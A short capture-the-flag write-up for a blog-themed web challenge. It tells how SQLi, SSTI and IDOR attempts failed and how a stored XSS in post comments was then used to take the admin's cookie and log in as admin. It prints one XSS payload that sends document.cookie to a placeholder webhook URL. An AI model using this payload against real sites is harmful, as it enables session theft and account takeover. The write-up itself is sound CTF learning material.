Star Wars

Typical XSS challenge.

Author: @congon4tor#2334
If you love Star Wars as much as I do you need to check out this blog!

On visiting the site, we was welcomed with a login and signup prompt. Trying some SQLi and SSTI doesn't work.

We have a site with post (and comment also!).

Given the use of numbering for each post, I also tried some IDOR tricks but it turned out that there is no hidden posts.

When comment, I received this notification:

Great! Someone is reading my comment, which is a perfect sign of XSS. Let's fire up webhooks and my favourite XSS payload:

<script>document.location="WEBHOOKS_URL/?q="+document.cookie</script>

And we got the admin's cookie:

Using this cookie to login, we are admin now and we can get the flag in the /admin endpoint.

Last updated 2 years ago